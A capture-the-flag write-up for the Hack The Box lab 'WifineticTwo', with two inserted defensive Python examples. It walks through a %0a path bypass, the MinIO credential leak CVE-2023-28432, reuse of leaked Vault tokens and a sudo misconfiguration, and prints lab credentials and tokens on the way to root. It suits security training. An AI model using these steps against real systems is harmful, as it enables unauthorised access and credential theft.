WifineticTwo HTB Writeup | HacktheBox

Introduction

In this post, I’ll show you how to solve the challenge WifineticTwo from HTB. If you have any questions, feel free to comment below.

Hacking Phases in WifineticTwo

  1. Add IP address to the /etc/hosts file.
  2. Scan with Nmap.
  3. Check out the website to gather information.
  4. Gather credentials.
  5. Find out the users.
  6. Escalate privileges.

Let’s Begin

Add IP to /etc/hosts

Please add the domain WifineticTwo.htb to your /etc/hosts file.

sudo nano /etc/hosts

Nmap Scan

Let’s run a Nmap scan.

nmap -A 10.10.11.254 -Pn

Let’s find subdomains by using Gobuster for enumeration.

gobuster dns -d WifineticTwo.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 20

We found a subdomain called demo.WifineticTwo.htb, which seems to be included in the host file.

Site Enumeration

We can use the basic/default login details to sign in.

guest:guest

Credential Harvest

On the left side, there’s an option called MinIO Metrics. When we try to open MinIO Metrics, it gives us a 403 Forbidden error. To get around this, I added %0a at the end of the URL.

<http://demo.WifineticTwo.htb/metrics%0a>
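Why a trailing %0a can slip past a path-based deny rule, and a stricter check, as an added example that is not part of the original post. It assumes the edge rule compares the raw path and the backend decodes and trims it (the post does not say why the bypass works); all function names are hypothetical.

```python
import posixpath
import re
from urllib.parse import unquote

PROTECTED = ("/metrics",)                 # route taken from the URL in the post
CONTROL = re.compile(r"[\x00-\x20\x7f]")  # control characters and space

def backend_route(raw_path: str) -> str:
    """Assumed backend behaviour: percent-decode, then trim whitespace."""
    return unquote(raw_path).strip()

def naive_edge_decision(raw_path: str) -> str:
    """Weak rule: deny only when the raw, undecoded path matches exactly."""
    return "deny" if raw_path.rstrip("/") in PROTECTED else "allow"

def hardened_edge_decision(raw_path: str) -> str:
    """Decode to a fixed point, refuse control bytes, match the canonical path."""
    decoded = raw_path
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return "reject"                   # still changing after three rounds
    if CONTROL.search(decoded):
        return "reject"                   # %0a, %09, %00 ... never reach routing
    # normpath keeps a leading "//", so collapse leading slashes explicitly
    canonical = "/" + posixpath.normpath(decoded).lstrip("/")
    if any(canonical == p or canonical.startswith(p + "/") for p in PROTECTED):
        return "deny"
    return "allow"

if __name__ == "__main__":
    for path in ("/metrics", "/metrics%0a", "/metrics%250a", "/index.html"):
        print(path, naive_edge_decision(path), hardened_edge_decision(path),
              repr(backend_route(path)))
```

The mismatch is the point: the naive rule allows a path that the assumed backend still routes to /metrics, while the hardened rule refuses it before routing.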

At the endpoint, there’s a web address visible.

<http://prd23-s3-backend.WifineticTwo.htb/minio/v2/metrics/cluster>

Please add “prd23-s3-backend.WifineticTwo.htb” to the /etc/hosts file. We found a vulnerability, CVE-2023-28432, and there’s a GitHub Proof of Concept (PoC) available.

We need to check this “Information Leak Vulnerability” concerning MinIO. With this vulnerability, we can uncover some MinIO-related credentials. Use Burp Suite to intercept and get the credentials.

"MINIO_ROOT_USER": "5GrE1B2YGGyZzNHZaIww"
"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0"

Now, let’s install the MinIO client and then run it.

./mc alias set myminio http://prd23-s3-backend.WifineticTwo.htb/ 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

Let’s check for files.

./mc ls -r --versions myminio

Here, we’ve found some backup files with the .gz extension. I tried to download these files and extract them.

./mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz .
ls -la
tar -xzvf home_backup.tar.gz

User Enumeration

After looking through more files with the .gz extension, we discovered these ones.

export VAULT_API_ADDR="http://prd23-vault-internal.WifineticTwo.htb/"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"

To set up Vault, include “prd23-vault-internal.WifineticTwo.htb” in the /etc/hosts file. After that, execute the following commands.

export VAULT_ADDR="http://prd23-vault-internal.WifineticTwo.htb/"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
./vault login

First, import the configuration file into Vault, and then check if the token value is valid.

To get user access, run the provided code. It will generate a one-time password (OTP), which you should use as the password for the SSH connection.

./vault ssh -role dev_otp_key_role -mode otp askyy@10.10.11.254

Privilege Escalation

sudo -l

I ran the command /root/vault/vault-unseal -c /etc/vault-unseal.yaml.

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v

We noticed that a master token is generated. We have to copy it to a log file. So, let’s create a .log file in the current directory.

touch debug.log
chown askyy:askyy debug.log

ls -la

The chown makes askyy the owner of debug.log, so askyy can write to the file. Now run the following command.

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v /home/askyy/debug.log

The master token has been saved in the debug.log file. Please open and read the debug.log file.

cat debug.log
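Both the backup archive (an exported VAULT_TOKEN) and the unseal debug log (a master token) put a live secret in a file a low-privileged user can read. The scanner below is an added example, not part of the original post, for auditing such files on your own systems. The sample inputs and the log line format are constructed, the function names are hypothetical, and it goes slightly beyond the post by also matching the hvb. and hvr. Vault token prefixes.

```python
import re

# Vault tokens: hvs. (service), hvb. (batch), hvr. (recovery)
VAULT_TOKEN = re.compile(r"\bhv[sbr]\.[A-Za-z0-9_-]{20,}")
# KEY=value (shell) or "KEY": "value" (JSON) for the variable names seen in the post
ASSIGNMENT = re.compile(
    r"""(?P<key>VAULT_TOKEN|MINIO_ROOT_USER|MINIO_ROOT_PASSWORD)"""
    r"""["']?\s*[:=]\s*["']?(?P<val>[^\s"',]+)""")

def redact(value: str) -> str:
    """Keep only the token-type prefix (if any) and the length."""
    prefix = value[:4] if VAULT_TOKEN.match(value) else ""
    return f"{prefix}...[{len(value)} chars]"

def scan(text: str):
    """Return (line number, kind, redacted value) for each secret found."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        seen = set()
        for m in ASSIGNMENT.finditer(line):
            seen.add(m.group("val"))
            findings.append((lineno, m.group("key"), redact(m.group("val"))))
        for m in VAULT_TOKEN.finditer(line):
            if m.group(0) not in seen:    # not already reported as an assignment
                findings.append((lineno, "vault-token", redact(m.group(0))))
    return findings

# Constructed samples: a shell profile from a backup, a debug log, an env dump
SAMPLE_BASHRC = ('export VAULT_API_ADDR="http://vault.example.internal/"\n'
                 'export VAULT_TOKEN="hvs.CONSTRUCTEDsampleTOKEN0000001"\n')
SAMPLE_DEBUG_LOG = ('level=debug msg="unseal ok"\n'
                    'level=debug msg="root token hvs.CONSTRUCTEDsampleTOKEN0000002"\n')
SAMPLE_ENV_JSON = ('"MINIO_ROOT_USER": "constructedUser01",\n'
                   '"MINIO_ROOT_PASSWORD": "constructedPass01"')

if __name__ == "__main__":
    for name, text in (("bashrc", SAMPLE_BASHRC), ("debug.log", SAMPLE_DEBUG_LOG),
                       ("env", SAMPLE_ENV_JSON)):
        for finding in scan(text):
            print(name, *finding)
```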

Now, we’ve connected to Vault successfully. We can try logging in as the user “askyy” using the same method as before.

export VAULT_ADDR="http://prd23-vault-internal.WifineticTwo.htb/"
export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"

To obtain root access, run the provided code. It will generate a one-time password (OTP), which you should use as the password for the SSH connection.

./vault ssh -role admin_otp_key_role -mode otp root@10.10.11.254

Conclusion

To sum up, solving the WifineticTwo box involved tackling different challenges and weaknesses, such as finding subdomains, exploiting CVEs, and using tools like Vault to manage access.

By thoroughly exploring, exploiting, and adjusting configurations, we gained different levels of access. This highlights the significance of detailed investigation and exploitation methods in penetration testing situations.

